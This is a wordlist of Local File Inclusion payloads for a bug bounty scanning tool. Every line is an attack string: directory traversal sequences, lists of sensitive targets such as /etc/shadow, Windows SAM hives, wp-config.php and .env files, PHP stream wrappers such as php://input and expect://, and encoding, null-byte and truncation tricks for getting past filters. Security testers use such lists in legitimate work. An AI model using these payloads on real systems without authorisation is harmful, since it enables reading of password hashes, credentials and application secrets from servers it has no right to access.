# LFI (Local File Inclusion) Payloads Wordlist for MR Legacy Bug Bounty Tool
# Author: Abdulrahman Muhammad (0xLegacy)
# This file contains LFI payloads for testing file inclusion vulnerabilities

# Basic LFI Payloads
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
../../../../../../../../../../../../../
../../../../../../../../../../../../../../

# Path Traversal Payloads (Unix/Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/resolv.conf
/etc/profile
/etc/bashrc
/etc/motd
/etc/fstab
/etc/crontab
/etc/networks
/etc/environment
/etc/sudoers
/etc/os-release
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/php/*/php.ini
/etc/mysql/my.cnf
/proc/self/environ
/proc/self/cmdline
/proc/self/cwd
/proc/self/exe
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps
/proc/self/status
/proc/self/stat
/proc/version
/proc/mounts
/proc/cpuinfo
/proc/meminfo

# Path Traversal Payloads (Windows)
C:/Windows/win.ini
C:/Windows/system.ini
C:/Windows/System32/drivers/etc/hosts
C:/Windows/System32/config/SAM
C:/Windows/repair/SAM
C:/Windows/System32/config/RegBack/SAM
C:/Windows/System32/config/RegBack/system
C:/Windows/debug/NetSetup.log
C:/Windows/iis6.log
C:/Windows/system32/logfiles/httperr/httperr1.log
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/WINDOWS/Temp/
C:/WINDOWS/system32/drivers/etc/networks
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/LogFiles/

# Web Server Configuration and Log Files
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/www/html/index.php
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error.log
/usr/local/nginx/logs/access.log
/usr/local/nginx/logs/error.log
/opt/lampp/logs/access.log
/opt/lampp/logs/error.log
/opt/bitnami/apache2/logs/access.log
/opt/bitnami/apache2/logs/error.log

# Application Configuration Files
/var/www/config.php
/var/www/html/config.php
/var/www/configuration.php
/var/www/html/configuration.php
/var/www/wp-config.php
/var/www/html/wp-config.php
/var/www/config.inc.php
/var/www/html/config.inc.php
/var/www/database.php
/var/www/html/database.php
/var/www/db.php
/var/www/html/db.php
/var/www/connect.php
/var/www/html/connect.php
/var/www/settings.php
/var/www/html/settings.php
/var/www/conf.php
/var/www/html/conf.php

# PHP Wrappers
php://filter/convert.base64-encode/resource=
php://filter/read=convert.base64-encode/resource=
php://filter/resource=
php://input
php://output
php://fd
php://memory
php://temp
phar://
zip://
data://text/plain;base64,
data://text/plain,
file://
expect://
glob://

# Null Byte Injection (for older PHP versions < 5.3.4)
/etc/passwd%00
/etc/passwd%2500
/etc/passwd\0
../../../etc/passwd%00
../../../etc/passwd%2500
../../../etc/passwd\0
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd%00.html
../../../etc/passwd%00.php

# URL Encoding Techniques (Bypass Filters)
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

# Double URL Encoding
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc%25%32%66passwd

# Path Normalization Evasion
.//..//..//..//..//..//..//..//..//..//../etc/passwd
/./././././././././././etc/passwd
/etc/default/../passwd
/etc/default/.//../././././passwd
/etc/../../../../../../../../../../../etc/passwd

# LFI with Parameter Pollution
file=../../../etc/passwd&file=../../../etc/hosts
file=../../../etc/passwd%00&file=../../../etc/hosts

# Path Truncation (works on older PHP versions with fixed path length limits)
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd././././././././././././././././././././././././././././././././././././././././././././././././././././././

# Interesting files for web application testing
/var/www/html/index.php
/var/www/html/admin/
/var/www/html/config/
/var/www/html/includes/
/var/www/html/wp-config.php
/var/www/html/.env
/var/www/.env
/var/www/html/config.php
/var/www/html/database.php
/var/www/html/db.php
/var/www/html/wp-content/uploads/
/var/www/html/images/
/var/www/html/media/
/var/www/html/tmp/
/var/www/html/files/
/var/www/html/cache/